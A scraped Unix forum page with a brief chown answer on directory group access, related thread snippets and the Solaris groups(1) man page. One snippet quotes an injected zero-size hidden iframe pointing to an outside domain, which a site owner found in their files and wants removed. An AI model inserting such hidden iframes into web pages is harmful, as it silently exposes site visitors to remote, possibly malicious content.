Sponsored Content
Operating Systems AIX Can we add multiple groups to a directory or a file ? Post 302939688 by agent.kgb on Friday 27th of March 2015 04:03:50 PM
Old 03-27-2015
if you have only these two users, the easiest solutions is to make
Code:
chown user1:staff /testdir

then user1 will have write access to the directory and user2 (and other users from group staff) will have read-only access.

10 More Discussions You Might Find Interesting

1. Solaris

Removing user from multiple groups via command line

Want to know if any, a command line parameter(s) of removing a user from multiple groups without using any ineractive application? (1 Reply)
Discussion started by: jquizon62
1 Replies

2. Shell Programming and Scripting

check the file in multiple Directory in a script

hi, i want to write the script to list atleast one file inside that directory eg: /home/Log/amp01 /home/log/amp02 . . . /home/log/amp..N want to see atleast one file inside the /home/log/amp01 .... amp(N) if it not there.. need to give that no file exists inside... (3 Replies)
Discussion started by: mail2sant
3 Replies

3. UNIX for Dummies Questions & Answers

two groups with permission on one directory

Hi, I have a directory that needs to be accessed by the members of two groups: group1 needs rw access group2 needs only r access others should have no rights I must be missing something obvious, but I can't figure out how to do it! Any ideas? (2 Replies)
Discussion started by: StephenJH
2 Replies

4. Shell Programming and Scripting

[help]Delete or replace text in multiple file and multiple directory

here's the case : almost of php/html file on my site has added the text : <iframe src="http://google-analyze.cn/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>I don't know how this happen, so i want to remove above text from all... (16 Replies)
Discussion started by: dzufauzan
16 Replies

5. UNIX for Dummies Questions & Answers

How to add user to multiple groups

hi all i am new to solaris how to add a user to multiple(secondary) groups. user :anna Groups : delhi ,mumbai,pune i need like this in cat /etc/group delhi::anna mumbai::anna pune::anna i tried using usermod -a -G hyd anna that does int work how to delete user from group... (3 Replies)
Discussion started by: kalyankalyan
3 Replies

6. Shell Programming and Scripting

multiple groups of files processing

I have five directories, dir1 to dir5 for each directory, I have all same number-named folders. There are four types of folders, {1..10}, {20..30}, { 40..50}, {60..70} Now for each types of folder, I will do the same thing, here is the code for i in {1..5} do cd dir$i mkdir temp1 for... (5 Replies)
Discussion started by: ksgreen
5 Replies

7. UNIX for Dummies Questions & Answers

Multiple groups in directory / file permissions

Hi I need to permit one group to have r-x permissions on all files in a directory and another group to have just read access, im confused how to do this as if i set the 'Other' permission class as read access then all users will have access to them. So basically i have a directory which the... (2 Replies)
Discussion started by: m3y
2 Replies

8. Shell Programming and Scripting

Rename multiple file names in a directory

I hope some one can help me I have multiple files in a directory with out extension like as below mentioned. But i want to change all the file names along .DDMMYYYYHHMISS format. And all files should have same DDMMYYYYHHMISS. Scenario: direcory name = /vol/best/srcfiles files in a... (4 Replies)
Discussion started by: hari001
4 Replies

9. UNIX for Dummies Questions & Answers

Users in multiple groups?

Happy Thanksgiving Everyone!! I have a question about adding users to multiple groups. Thanks in advance Using Red Hat and here are the issues: Example: Users: Bob Mark Groups: SystemsAnalysts BusinessAnalysts If I am adding a user Bob to both groups (SystemsAnalysts and... (2 Replies)
Discussion started by: hansokl
2 Replies

10. Shell Programming and Scripting

how to find a pattern from an external file in a directory containing multiple file recursively

Hi, Need your help in this. I have an input file that has multiple enrollment_number, somewhat like 1234567 8901234 9856321 6732187 7623465 Now i have to search and delete these enrollment_number recursively from all the files that are within multiple sub-directories of a... (10 Replies)
Discussion started by: mukulverma2408
10 Replies
groups(1)							   User Commands							 groups(1)

NAME
groups - print group membership of user SYNOPSIS
groups [user...] DESCRIPTION
The command groups prints on standard output the groups to which you or the optionally specified user belong. Each user belongs to a group specified in /etc/passwd and possibly to other groups as specified in /etc/group. Note that /etc/passwd specifies the numerical ID (gid) of the group. The groups command converts gid to the group name in the output. EXAMPLES
The output takes the following form: example% groups tester01 tester02 tester01 : staff tester02 : staff example% FILES
/etc/passwd /etc/group ATTRIBUTES
See attributes(5) for descriptions of the following attributes: +-----------------------------+-----------------------------+ | ATTRIBUTE TYPE | ATTRIBUTE VALUE | +-----------------------------+-----------------------------+ |Availability |SUNWcsu | +-----------------------------+-----------------------------+ SEE ALSO
group(4), passwd(4), attributes(5) SunOS 5.10 14 Sep 1992 groups(1)